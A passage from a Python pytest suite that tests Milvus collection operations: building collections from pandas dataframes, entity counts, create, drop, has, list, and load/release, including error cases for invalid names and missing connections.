        self.collection_wrap.init_collection(name=cf.gen_unique_str(prefix), schema=schema,
                                             check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_load_collection_after_load_partition(self):
        """
        target: test load the partition after load collection
        method: load collection and then load the partition
        expected: raise exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_w1 = self.init_partition_wrap(collection_w)
        partition_w1.insert(cf.gen_default_list_data())
        collection_w.load()
        error = {ct.err_code: 1, ct.err_msg: f'load the partition after load collection is not supported'}
        partition_w1.load(check_task=CheckTasks.err_res,
                          check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_load_collection_release_partition(self):
        """
        target: test release the partition after load collection
        method: load collection and release the partition
        expected: raise exception
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        partition_w1 = self.init_partition_wrap(collection_w)
        partition_w1.insert(cf.gen_default_list_data())
        collection_w.load()
        error = {ct.err_code: 1, ct.err_msg: f'releasing the partition after load collection is not supported'}
        partition_w1.release(check_task=CheckTasks.err_res,
                             check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_load_collection_after_release_collection(self):
        """
        target: test release the collection after load collection
        method: load collection and release the collection
        expected: no exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
                                                 check_items={exp_name: c_name, exp_schema: default_schema})
        collection_w.insert(cf.gen_default_list_data())
        collection_w.load()
        collection_w.release()
class TestCollectionDataframe(TestcaseBase):
    """
    ******************************************************************
    The following cases are used to test construct_from_dataframe
    ******************************************************************
    """
    @pytest.fixture(scope="function", params=ct.get_invalid_strs)
    def get_non_df(self, request):
        # None is excluded here because it is covered by a dedicated case
        # (test_construct_from_none_dataframe) with a different error message
        if request.param is None:
            pytest.skip("skip None")
        yield request.param
    @pytest.mark.tags(CaseLabel.L0)
    def test_construct_from_dataframe(self):
        """
        target: test collection with dataframe data
        method: create collection and insert with dataframe
        expected: collection num entities equal to nb
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = cf.gen_default_dataframe_data(ct.default_nb)
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      check_task=CheckTasks.check_collection_property,
                                                      check_items={exp_name: c_name, exp_schema: default_schema})
        # flush
        assert self.collection_wrap.num_entities == ct.default_nb
    @pytest.mark.tags(CaseLabel.L0)
    def test_construct_from_binary_dataframe(self):
        """
        target: test binary collection with dataframe
        method: create binary collection with dataframe
        expected: collection num entities equal to nb
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df, _ = cf.gen_default_binary_dataframe_data(nb=ct.default_nb)
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      check_task=CheckTasks.check_collection_property,
                                                      check_items={exp_name: c_name, exp_schema: default_binary_schema})
        assert self.collection_wrap.num_entities == ct.default_nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_from_none_dataframe(self):
        """
        target: test create collection by empty dataframe
        method: invalid dataframe type create collection
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        error = {ct.err_code: 0, ct.err_msg: "Dataframe can not be None."}
        self.collection_wrap.construct_from_dataframe(c_name, None, check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_from_dataframe_only_column(self):
        """
        target: test collection with dataframe only columns
        method: dataframe only has columns
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        # dataframe with column labels but zero rows
        df = pd.DataFrame(columns=[ct.default_int64_field_name, ct.default_float_vec_field_name])
        error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_from_inconsistent_dataframe(self):
        """
        target: test collection with data inconsistent
        method: create and insert with inconsistent data
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        # one field different type df
        mix_data = [(1, 2., [0.1, 0.2]), (2, 3., 4)]
        df = pd.DataFrame(data=mix_data, columns=list("ABC"))
        error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field='A', check_task=CheckTasks.err_res,
                                                      check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_from_non_dataframe(self, get_non_df):
        """
        target: test create collection by invalid dataframe
        method: non-dataframe type create collection
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        error = {ct.err_code: 0, ct.err_msg: "Data type must be pandas.DataFrame."}
        df = get_non_df
        self.collection_wrap.construct_from_dataframe(c_name, df, check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_from_data_type_dataframe(self):
        """
        target: test collection with invalid dataframe
        method: create with invalid dataframe
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        # datetime column has no mappable Milvus data type
        df = pd.DataFrame({"date": pd.date_range('20210101', periods=3), ct.default_int64_field_name: [1, 2, 3]})
        error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe."}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_from_invalid_field_name(self):
        """
        target: test collection with invalid field name
        method: create with invalid field name dataframe
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = pd.DataFrame({'%$#': cf.gen_vectors(3, 2), ct.default_int64_field_name: [1, 2, 3]})
        error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_none_primary_field(self):
        """
        target: test collection with none primary field
        method: primary_field is none
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = cf.gen_default_dataframe_data(ct.default_nb)
        error = {ct.err_code: 0, ct.err_msg: "Schema must have a primary key field."}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=None,
                                                      check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_not_existed_primary_field(self):
        """
        target: test collection with not existed primary field
        method: primary field not existed
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = cf.gen_default_dataframe_data(ct.default_nb)
        # c_name is a fresh unique string, guaranteed not to be a dataframe column
        error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=c_name,
                                                      check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_with_none_auto_id(self):
        """
        target: test construct with auto_id=None
        method: pass auto_id=None to construct_from_dataframe
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = cf.gen_default_dataframe_data(ct.default_nb)
        error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      auto_id=None, check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L1)
    def test_construct_auto_id_true_insert(self):
        """
        target: test construct with true auto_id
        method: auto_id=True and insert values
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = cf.gen_default_dataframe_data(nb=100)
        # with auto_id=True the primary column must not carry user-supplied values
        error = {ct.err_code: 0, ct.err_msg: "Auto_id is True, primary field should not have data."}
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      auto_id=True, check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L1)
    def test_construct_auto_id_true_no_insert(self):
        """
        target: test construct with true auto_id
        method: auto_id=True and not insert ids(primary fields all values are None)
        expected: verify num entities
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = cf.gen_default_dataframe_data()
        # df.drop(ct.default_int64_field_name, axis=1, inplace=True)
        # keep the column but blank it out so the server generates the ids
        df[ct.default_int64_field_name] = None
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      auto_id=True)
        assert self.collection_wrap.num_entities == ct.default_nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_none_value_auto_id_true(self):
        """
        target: test construct with none value, auto_id
        method: df primary field with none value, auto_id=true
        expected: todo
        """
        self._connect()
        nb = 100
        df = cf.gen_default_dataframe_data(nb)
        # column 0 is the primary field; NaN values stand in for "no id supplied"
        df.iloc[:, 0] = numpy.NaN
        res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
                                                               primary_field=ct.default_int64_field_name, auto_id=True)
        mutation_res = res[1]
        assert cf._check_primary_keys(mutation_res.primary_keys, 100)
        assert self.collection_wrap.num_entities == nb
    @pytest.mark.tags(CaseLabel.L1)
    def test_construct_auto_id_false(self):
        """
        target: test construct with false auto_id
        method: auto_id=False, primary_field correct
        expected: verify auto_id
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        df = cf.gen_default_dataframe_data(ct.default_nb)
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      auto_id=False)
        assert not self.collection_wrap.schema.auto_id
        assert self.collection_wrap.num_entities == ct.default_nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_construct_none_value_auto_id_false(self):
        """
        target: test construct with none value, auto_id
        method: df primary field with none value, auto_id=false
        expected: raise exception
        """
        self._connect()
        nb = 100
        df = cf.gen_default_dataframe_data(nb)
        # NaN coerces the int64 primary column to float, which the schema rejects
        df.iloc[:, 0] = numpy.NaN
        error = {ct.err_code: 0, ct.err_msg: "Primary key type must be DataType.INT64"}
        self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
                                                      primary_field=ct.default_int64_field_name, auto_id=False,
                                                      check_task=CheckTasks.err_res, check_items=error)
    @pytest.mark.tags(CaseLabel.L1)
    def test_construct_auto_id_false_same_values(self):
        """
        target: test construct with false auto_id and same value
        method: auto_id=False, primary field same values
        expected: verify num entities
        """
        self._connect()
        nb = 100
        df = cf.gen_default_dataframe_data(nb)
        # duplicate primary keys: rows 1..nb-1 all get the value 1
        df.iloc[1:, 0] = 1
        res, _ = self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
                                                               primary_field=ct.default_int64_field_name, auto_id=False)
        collection_w = res[0]
        assert collection_w.num_entities == nb
        mutation_res = res[1]
        assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
    @pytest.mark.tags(CaseLabel.L1)
    def test_construct_auto_id_false_negative_values(self):
        """
        target: test construct with negative values
        method: auto_id=False, primary field values is negative
        expected: verify num entities
        """
        self._connect()
        nb = 100
        df = cf.gen_default_dataframe_data(nb)
        # primary keys 0, -1, -2, ..., -(nb-1)
        new_values = pd.Series(data=[i for i in range(0, -nb, -1)])
        df[ct.default_int64_field_name] = new_values
        self.collection_wrap.construct_from_dataframe(cf.gen_unique_str(prefix), df,
                                                      primary_field=ct.default_int64_field_name, auto_id=False)
        assert self.collection_wrap.num_entities == nb
    @pytest.mark.tags(CaseLabel.L1)
    def test_construct_from_dataframe_dup_name(self):
        """
        target: test collection with dup name and insert dataframe
        method: create collection with dup name, none schema, dataframe
        expected: two collection object is correct
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        collection_w = self.init_collection_wrap(name=c_name, primary_field=ct.default_int64_field_name,
                                                 check_task=CheckTasks.check_collection_property,
                                                 check_items={exp_name: c_name, exp_schema: default_schema})
        df = cf.gen_default_dataframe_data(ct.default_nb)
        self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name,
                                                      check_task=CheckTasks.check_collection_property,
                                                      check_items={exp_name: c_name, exp_schema: default_schema})
        # flush
        # both wrappers point at the same collection, so their counts must agree
        assert collection_w.num_entities == ct.default_nb
        assert collection_w.num_entities == self.collection_wrap.num_entities
class TestCollectionCount(TestcaseBase):
    @pytest.mark.tags(CaseLabel.L2)
    def test_collection_count_no_vectors(self, connect, collection):
        """
        target: test collection rows_count is correct or not, if collection is empty
        method: create collection and no vectors in it,
            assert the value returned by num_entities attribute is equal to 0
        expected: the count is equal to 0
        """
        # NOTE(review): the `connect` and `collection` fixture params are unused here
        # (the body uses self._connect/init_collection_wrap instead) — likely leftovers
        # from an older test framework; kept to avoid changing the pytest signature
        self._connect()
        collection_w = self.init_collection_wrap()
        assert collection_w.num_entities == 0
class TestCollectionCountIP(TestcaseBase):
    """
    params means different nb, the nb value may trigger merge, or not
    """
    @pytest.fixture(
        scope="function",
        params=[
            1,
            1000,
            2001
        ],
    )
    def insert_count(self, request):
        yield request.param
    @pytest.mark.tags(CaseLabel.L1)
    def test_collection_count_after_index_created(self, insert_count):
        """
        target: test count_entities, after index have been created
        method: add vectors in db, and create index, then calling num_entities with correct params
        expected: num_entities equals the number of inserted entities
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        data = cf.gen_default_list_data(insert_count, ct.default_dim)
        collection_w.insert(data)
        collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
                                  index_name=ct.default_index_name)
        # index creation must not change the reported entity count
        assert collection_w.num_entities == insert_count
class TestCollectionCountBinary(TestcaseBase):
    """
    Parametrized over different nb values; some may trigger a segment merge.
    """

    @pytest.fixture(scope="function", params=[1, 1000, 2001])
    def insert_count(self, request):
        yield request.param

    # TODO: need to update and enable
    @pytest.mark.tags(CaseLabel.L1)
    def test_collection_count_after_index_created_binary(self, insert_count):
        """
        target: check num_entities after a binary index has been built
        method: insert binary entities, build an index on the binary-vector
                field, then read num_entities
        expected: num_entities equals the number of inserted entities
        """
        self._connect()
        name = cf.gen_unique_str(prefix)
        wrapper = self.init_collection_wrap(name=name, schema=default_binary_schema)
        binary_df, _ = cf.gen_default_binary_dataframe_data(insert_count)
        wrapper.insert(data=binary_df)
        wrapper.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
        assert wrapper.num_entities == insert_count

    @pytest.mark.tags(CaseLabel.L2)
    def test_collection_count_no_entities(self):
        """
        target: verify num_entities on an empty binary collection
        method: create a binary collection and insert nothing
        expected: num_entities is 0
        """
        self._connect()
        name = cf.gen_unique_str(prefix)
        wrapper = self.init_collection_wrap(name=name, schema=default_binary_schema)
        assert wrapper.num_entities == 0
class TestCollectionMultiCollections(TestcaseBase):
    """
    Parametrized over different nb values; some may trigger a segment merge.
    """

    @pytest.fixture(scope="function", params=[1, 1000, 2001])
    def insert_count(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.L0)
    def test_collection_count_multi_collections_l2(self, insert_count):
        """
        target: verify row count across multiple L2 collections
        method: create several collections, insert the same entities into
                each, then check num_entities on every one
        expected: each collection reports the inserted entity count
        """
        self._connect()
        entities = cf.gen_default_list_data(insert_count)
        num_collections = 20
        names = []
        for _ in range(num_collections):
            name = gen_unique_str(uid_count)
            wrapper = self.init_collection_wrap(name=name)
            wrapper.insert(entities)
            names.append(name)
        for name in names:
            self.collection_wrap.init_collection(name)
            assert self.collection_wrap.num_entities == insert_count

    @pytest.mark.tags(CaseLabel.L2)
    def test_collection_count_multi_collections_binary(self, insert_count):
        """
        target: verify row count across multiple binary (JACCARD) collections
        method: create several binary collections, insert the same dataframe
                into each, then check num_entities on every one
        expected: each collection reports the inserted entity count
        """
        self._connect()
        binary_df, _ = cf.gen_default_binary_dataframe_data(insert_count)
        num_collections = 20
        names = []
        for _ in range(num_collections):
            name = cf.gen_unique_str(prefix)
            wrapper = self.init_collection_wrap(name=name, schema=default_binary_schema)
            wrapper.insert(data=binary_df)
            names.append(name)
        for name in names:
            self.collection_wrap.init_collection(name)
            assert self.collection_wrap.num_entities == insert_count

    @pytest.mark.tags(CaseLabel.L2)
    def test_collection_count_multi_collections_mix(self):
        """
        target: verify row count across a mix of float and binary collections
        method: create half float-vector and half binary-vector collections,
                insert default_nb entities into each, then check num_entities
        expected: each collection reports ct.default_nb entities
        """
        self._connect()
        names = []
        num_collections = 20
        float_data = cf.gen_default_list_data()
        binary_df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
        for _ in range(num_collections // 2):
            name = gen_unique_str(uid_count)
            wrapper = self.init_collection_wrap(name=name)
            wrapper.insert(float_data)
            names.append(name)
        for _ in range(num_collections // 2, num_collections):
            name = cf.gen_unique_str(prefix)
            wrapper = self.init_collection_wrap(name=name, schema=default_binary_schema)
            wrapper.insert(data=binary_df)
            names.append(name)
        for name in names:
            self.collection_wrap.init_collection(name)
            assert self.collection_wrap.num_entities == ct.default_nb
class TestCreateCollection(TestcaseBase):

    @pytest.mark.tags(CaseLabel.L1)
    def test_create_collection_multithread(self):
        """
        target: create collections concurrently from multiple threads
        method: spawn several threads that each create a uniquely named
                collection, then verify every name is listed
        expected: all collections are created
        """
        self._connect()
        thread_count = 8
        workers = []
        created_names = []

        def create_one():
            name = gen_unique_str(uid_create)
            created_names.append(name)
            self.init_collection_wrap(name=name)

        for _ in range(thread_count):
            worker = MyThread(target=create_one, args=())
            workers.append(worker)
            worker.start()
            time.sleep(0.2)
        for worker in workers:
            worker.join()
        for name in created_names:
            assert name in self.utility_wrap.list_collections()[0]
class TestCreateCollectionInvalid(TestcaseBase):
    """
    Test creating collections with invalid params
    """

    @pytest.mark.tags(CaseLabel.L2)
    def test_create_collection_limit_fields(self):
        """
        target: create a collection whose field count exceeds the limit
        method: build a schema with ct.max_field_num extra int64 fields on
                top of the primary key and vector field, then create
        expected: raise exception
        """
        self._connect()
        name = cf.gen_unique_str(prefix)
        # primary key and vector field, plus max_field_num scalar fields
        # pushes the total over the server-side limit
        fields = [cf.gen_int64_field(ct.default_int64_field_name, is_primary=True),
                  cf.gen_float_vec_field(ct.default_float_vec_field_name)]
        for _ in range(ct.max_field_num):
            fields.append(cf.gen_int64_field(gen_unique_str("field_name")))
        expected_err = {ct.err_code: 1, ct.err_msg: "'maximum field\'s number should be limited to 256'"}
        schema, _ = self.collection_schema_wrap.init_collection_schema(fields=fields)
        self.init_collection_wrap(name=name, schema=schema,
                                  check_task=CheckTasks.err_res, check_items=expected_err)
class TestDropCollection(TestcaseBase):
    """
    ******************************************************************
    The following cases are used to test `drop_collection` function
    ******************************************************************
    """

    @pytest.mark.tags(CaseLabel.L0)
    def test_drop_collection_A(self):
        """
        target: drop a collection created with correct params
        method: create a collection, drop it, then check existence
        expected: status ok, and the collection no longer exists
        """
        self._connect()
        name = cf.gen_unique_str()
        wrapper = self.init_collection_wrap(name=name)
        wrapper.drop()
        assert not self.utility_wrap.has_collection(name)[0]

    @pytest.mark.tags(CaseLabel.L2)
    def test_drop_collection_without_connection(self):
        """
        target: drop a collection through a disconnected client
        method: create a collection, remove the connection, then drop
        expected: drop raises an exception
        """
        self._connect()
        name = cf.gen_unique_str(prefix)
        wrapper = self.init_collection_wrap(name)
        self.connection_wrap.remove_connection(ct.default_alias)
        alive_connections, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in alive_connections
        expected_err = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
        wrapper.drop(check_task=CheckTasks.err_res, check_items=expected_err)

    @pytest.mark.tags(CaseLabel.L1)
    def test_drop_collection_not_existed(self):
        """
        target: drop a collection name that was never created
        method: create one collection, then drop a different random name
        expected: raise exception
        """
        self._connect()
        existing = cf.gen_unique_str()
        self.init_collection_wrap(name=existing)
        missing = cf.gen_unique_str()
        expected_err = {ct.err_code: 0,
                        ct.err_msg: "DescribeCollection failed: can't find collection: %s" % missing}
        self.utility_wrap.drop_collection(missing, check_task=CheckTasks.err_res,
                                          check_items=expected_err)

    @pytest.mark.tags(CaseLabel.L1)
    def test_create_drop_collection_multithread(self):
        """
        target: create and drop collections concurrently
        method: spawn several threads that each create and immediately drop
                a collection
        expected: none of the created collections remain
        """
        self._connect()
        thread_count = 8
        workers = []
        created_names = []

        def create_then_drop():
            name = cf.gen_unique_str()
            created_names.append(name)
            wrapper = self.init_collection_wrap(name=name)
            wrapper.drop()

        for _ in range(thread_count):
            worker = MyThread(target=create_then_drop, args=())
            workers.append(worker)
            worker.start()
            time.sleep(0.2)
        for worker in workers:
            worker.join()
        for name in created_names:
            assert not self.utility_wrap.has_collection(name)[0]
class TestDropCollectionInvalid(TestcaseBase):
    """
    Test drop collection with invalid params
    """

    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
    def test_drop_collection_with_invalid_collection_name(self, name):
        """
        target: drop a collection using an invalid name
        method: call drop_collection with each invalid name variant
        expected: raise exception
        """
        self._connect()
        expected_err = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
        self.utility_wrap.drop_collection(name, check_task=CheckTasks.err_res,
                                          check_items=expected_err)

    @pytest.mark.tags(CaseLabel.L2)
    def test_drop_collection_with_empty_or_None_collection_name(self):
        """
        target: drop a collection using an empty or None name
        method: call drop_collection with '' and then with None
        expected: raise exception for both
        """
        self._connect()
        empty_err = {ct.err_code: -1, ct.err_msg: '`collection_name` value is illegal'}
        self.utility_wrap.drop_collection('', check_task=CheckTasks.err_res,
                                          check_items=empty_err)
        none_err = {ct.err_code: -1, ct.err_msg: '`collection_name` value None is illegal'}
        self.utility_wrap.drop_collection(None, check_task=CheckTasks.err_res,
                                          check_items=none_err)
class TestHasCollection(TestcaseBase):
    """
    ******************************************************************
    The following cases are used to test `has_collection` function
    ******************************************************************
    """

    @pytest.mark.tags(CaseLabel.L2)
    def test_has_collection_without_connection(self):
        """
        target: test has collection, without connection
        method: calling has collection with correct params, with a disconnected instance
        expected: has collection raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        self.init_collection_wrap(c_name)
        self.connection_wrap.remove_connection(ct.default_alias)
        res_list, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in res_list
        error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
        self.utility_wrap.has_collection(c_name, check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_has_collection_not_existed(self):
        """
        target: test if collection not created
        method: random a collection name, create this collection then drop it,
                assert the value returned by has_collection method
        expected: False
        """
        self._connect()
        c_name = cf.gen_unique_str()
        collection_wr = self.init_collection_wrap(name=c_name)
        collection_wr.drop()
        assert not self.utility_wrap.has_collection(c_name)[0]

    @pytest.mark.tags(CaseLabel.L2)
    def test_has_collection_multithread(self):
        """
        target: test has_collection with multi-thread
        method: check the same collection from several threads concurrently
        expected: every thread sees the collection
        """
        self._connect()
        threads_num = 4
        threads = []
        c_name = cf.gen_unique_str()
        self.init_collection_wrap(name=c_name)

        def has():
            # BUGFIX: the wrapper returns a (result, check_result) tuple, so
            # asserting the tuple itself was always truthy (vacuous test).
            # Index [0] to assert the actual boolean, matching the other cases.
            assert self.utility_wrap.has_collection(c_name)[0]

        for i in range(threads_num):
            t = MyThread(target=has, args=())
            threads.append(t)
            t.start()
            time.sleep(0.2)
        for t in threads:
            t.join()
class TestHasCollectionInvalid(TestcaseBase):

    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
    def test_has_collection_with_invalid_collection_name(self, name):
        """
        target: check collection existence with an invalid name
        method: call has_collection with each invalid name variant
        expected: raise exception
        """
        self._connect()
        expected_err = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
        self.utility_wrap.has_collection(name, check_task=CheckTasks.err_res,
                                         check_items=expected_err)

    @pytest.mark.tags(CaseLabel.L2)
    def test_has_collection_with_empty_collection_name(self):
        """
        target: check collection existence with an empty name
        method: call has_collection with ''
        expected: raise exception
        """
        self._connect()
        expected_err = {ct.err_code: -1, ct.err_msg: '`collection_name` value is illegal'}
        self.utility_wrap.has_collection('', check_task=CheckTasks.err_res,
                                         check_items=expected_err)

    @pytest.mark.tags(CaseLabel.L2)
    def test_has_collection_with_none_collection_name(self):
        """
        target: check collection existence with a None name
        method: call has_collection with None
        expected: raise exception
        """
        self._connect()
        expected_err = {ct.err_code: -1, ct.err_msg: '`collection_name` value None is illegal'}
        self.utility_wrap.has_collection(None, check_task=CheckTasks.err_res,
                                         check_items=expected_err)
class TestListCollections(TestcaseBase):
    """
    ******************************************************************
    The following cases are used to test `utility.list_collections()` function
    ******************************************************************
    """

    @pytest.mark.tags(CaseLabel.L0)
    def test_list_collections_multi_collections(self):
        """
        target: list collections after creating many of them
        method: create 50 collections, then verify each name appears in
                list_collections and drop it
        expected: every created collection is listed
        """
        self._connect()
        num_collections = 50
        names = []
        for _ in range(num_collections):
            name = cf.gen_unique_str()
            names.append(name)
            self.init_collection_wrap(name=name)
        for name in names:
            assert name in self.utility_wrap.list_collections()[0]
            self.utility_wrap.drop_collection(name)

    @pytest.mark.tags(CaseLabel.L2)
    def test_list_collections_without_connection(self):
        """
        target: list collections through a disconnected client
        method: remove the connection, then call list_collections
        expected: raise exception
        """
        self._connect()
        self.connection_wrap.remove_connection(ct.default_alias)
        alive_connections, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in alive_connections
        expected_err = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
        self.utility_wrap.list_collections(check_task=CheckTasks.err_res,
                                           check_items=expected_err)

    @pytest.mark.tags(CaseLabel.L2)
    def test_list_collections_multithread(self):
        """
        target: list collections from multiple threads concurrently
        method: create one collection, then have several threads assert it
                appears in list_collections
        expected: every thread sees the collection listed
        """
        self._connect()
        thread_count = 10
        workers = []
        name = cf.gen_unique_str()
        self.init_collection_wrap(name=name)

        def check_listed():
            assert name in self.utility_wrap.list_collections()[0]

        for _ in range(thread_count):
            worker = MyThread(target=check_listed)
            workers.append(worker)
            worker.start()
            time.sleep(0.2)
        for worker in workers:
            worker.join()
class TestLoadCollection(TestcaseBase):
    """
    ******************************************************************
    The following cases are used to test `collection.load()` function
    ******************************************************************
    """

    @pytest.mark.tags(CaseLabel.L0)
    def test_load_collection_after_index(self):
        """
        target: test load collection, after index created
        method: insert and create index, load collection with correct params
        expected: no error raised
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        data = cf.gen_default_list_data()
        collection_w.insert(data)
        collection_w.create_index(ct.default_float_vec_field_name, default_index_params,
                                  index_name=ct.default_index_name)
        collection_w.load()
        collection_w.release()

    @pytest.mark.tags(CaseLabel.L1)
    def test_load_collection_after_index_binary(self):
        """
        target: test load binary_collection, after index created
        method: insert and create index, load binary_collection with correct params
        expected: no error raised
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
        df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
        mutation_res, _ = collection_w.insert(data=df)
        collection_w.create_index(ct.default_binary_vec_field_name, default_binary_index_params)
        collection_w.load()
        collection_w.release()

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_empty_collection(self):
        """
        target: test load an empty collection with no data inserted
        method: no entities in collection, load and release the collection
        expected: load and release successfully
        """
        self._connect()
        collection_w = self.init_collection_wrap()
        collection_w.load()
        collection_w.release()

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_collection_dis_connect(self):
        """
        target: test load collection, without connection
        method: load collection with correct params, with a disconnected instance
        expected: load raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        collection_wr = self.init_collection_wrap(c_name)
        self.connection_wrap.remove_connection(ct.default_alias)
        res_list, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in res_list
        error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
        collection_wr.load(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_release_collection_dis_connect(self):
        """
        target: test release collection, without connection
        method: release collection with correct params, with a disconnected instance
        expected: release raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str(prefix)
        collection_wr = self.init_collection_wrap(c_name)
        self.connection_wrap.remove_connection(ct.default_alias)
        res_list, _ = self.connection_wrap.list_connections()
        assert ct.default_alias not in res_list
        error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
        collection_wr.release(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_load_collection_not_existed(self):
        """
        target: test load invalid collection
        method: load not existed collection
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str()
        collection_wr = self.init_collection_wrap(name=c_name)
        collection_wr.drop()
        error = {ct.err_code: 0,
                 ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
        collection_wr.load(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_release_collection_not_existed(self):
        """
        target: test release a not existed collection
        method: release with a not existed collection name
        expected: raise exception
        """
        self._connect()
        c_name = cf.gen_unique_str()
        collection_wr = self.init_collection_wrap(name=c_name)
        collection_wr.drop()
        error = {ct.err_code: 0,
                 ct.err_msg: "DescribeCollection failed: can't find collection: %s" % c_name}
        collection_wr.release(check_task=CheckTasks.err_res, check_items=error)

    @pytest.mark.tags(CaseLabel.L2)
    def test_release_collection_not_load(self):
        """
        target: test release collection without load
        method: release collection without load
        expected: release successfully
        """
        self._connect()
        c_name = cf.gen_unique_str()
